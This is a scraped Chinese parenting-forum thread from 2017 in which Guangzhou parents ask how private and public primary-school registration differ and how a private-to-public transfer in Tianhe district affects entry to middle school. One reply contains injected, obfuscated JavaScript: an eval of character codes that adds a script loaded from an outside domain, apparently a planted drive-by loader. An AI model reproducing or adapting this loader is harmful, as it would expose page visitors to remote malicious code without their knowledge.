帖子详情

请问民办小学和公办小学学籍有什么不同?有公办小学就读资格先就读民办,后面转公办要怎么弄?影响小升初吗?

2426422家有小学生

请问民办小学和公办小学学籍有什么不同?有公办小学就读资格先就读民办,后面转公办要怎么弄?影响小升初吗?另外,咨询民办转公办+返区生(天河)的操作难度
精选回帖
fuzhuo6fuzhuo611楼
估计是先转回公办小学,然后小升初吧
2017/04/03回复
fuxfanfuxfan13楼
本帖最后由 fuxfan 于 2017-4-4 16:26 编辑 http://www.gzyxedu.net/yxweb/res ... 415142714_12530.htm这是越秀的
2017/04/04回复
fuxfanfuxfan14楼
天河的,叫“民办转公办生”,不一定非要转到公办小学小升初时申请,符合“人户一致”的,对口直升;不符合“人户一致”的统筹
$('ed2k_LuM').innerHTML=htmlspecialchars(unescape(decodeURIComponent('filesize')))+' ('+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+' Bytes)';应该是先转公办,然后再升的吧
2017/04/09回复
全部回帖
估计是先转回公办小学,然后小升初吧。。
2017/03/23回复
yuanstar:
请问民办小学和公办小学学籍有什么不同?有公办小学就读资格先就读民办,后面转公办要怎么弄?影响小升初吗?另外,咨询民办转公办+返区生(天河)的操作难度
查看原文
有点复杂
一直放飞梦想:
有点复杂
查看原文
愿闻其详,还望有空时不吝赐教!
一直放飞梦想:
有点复杂
查看原文
愿闻其详,还望有空时不吝赐教!
刚刚网络不好,重复了。我们家的情况:小孩去年上一年级,因为周边对口公办小学质量一般,就上了学费不菲的民办。当时以为只要是广州市学籍+户籍以后还是可以上公办中学,现在看了一些帖子,貌似民办学籍和公办学籍有区别?不能直接升公办中学?不知我的理解有没有偏差……还有,如果在小学阶段买了天河的学位房户口转到天河,孩子能否返区直升公立中学呢?
顶下。mark
2017/03/26回复
顶下。mark
2017/04/02回复
广州户口可以回原籍派位,也可以自己考。一点都不复杂,就这么规定的。
2017/04/02回复
fuzhuo6fuzhuo610楼
估计是先转回公办小学,然后小升初吧
2017/04/03回复
哦,要是对口的公办小学没了学位,或者到了六年级不让转校了,如何升初中呢?
fuxfanfuxfan13楼
天河的,叫“民办转公办生”,不一定非要转到公办小学

小升初时申请,符合“人户一致”的,对口直升;不符合“人户一致”的统筹
很详细、有用的信息!多谢指点🙏
民转公也学习了解一下,谢谢!
2017/04/05回复
学习了,感谢分享。。
2017/04/05回复
感谢分享。。多多学习。。
2017/04/06回复
ikl2088ikl208818楼
BDBD。。。

应该是先转公办,然后再升的吧
先转公办吧。。。
今天02:02回复
猜你喜欢

还不知道2018年广州积分入学条件新规定?广州各区公办小学入学政策汇总贴!

请问跑马地花园是公办还是民办的?师资好吗?

华师附小是公办还是民办?入读要有什么条件?

本地户口,却公办民办都不接收怎么办?急!

请问学籍不在广州,户口在白云区小升初可以入白云区的公办小学吗?

请问可以同时报公办小学和民办的吗?

热点推荐

最强狂风暴雨要来!多区雷雨大风橙色预警

打卡记录假期出游 领6W+金币超大奖励!

母亲节花式宠爱你!瑜见美好孕动会

这个折扣仓生意很好 每天的商品都不一样

#五一宝藏时光记#错峰出游,包场潮州游!

夜游裕后街

非要在暴雨天搭帐篷合理吗?

白廊东江湖

#五一宝藏时光记#记录假期出游每一天,领取

人少好逛!广州新晋遛娃商场!娃可以呆上一

#五一宝藏时光记#5月1日回顾前两日错峰潮州

郴州"小南京"-瓦窑坪

今天下班被教练“尾随”啦哈哈

查看更多热点 >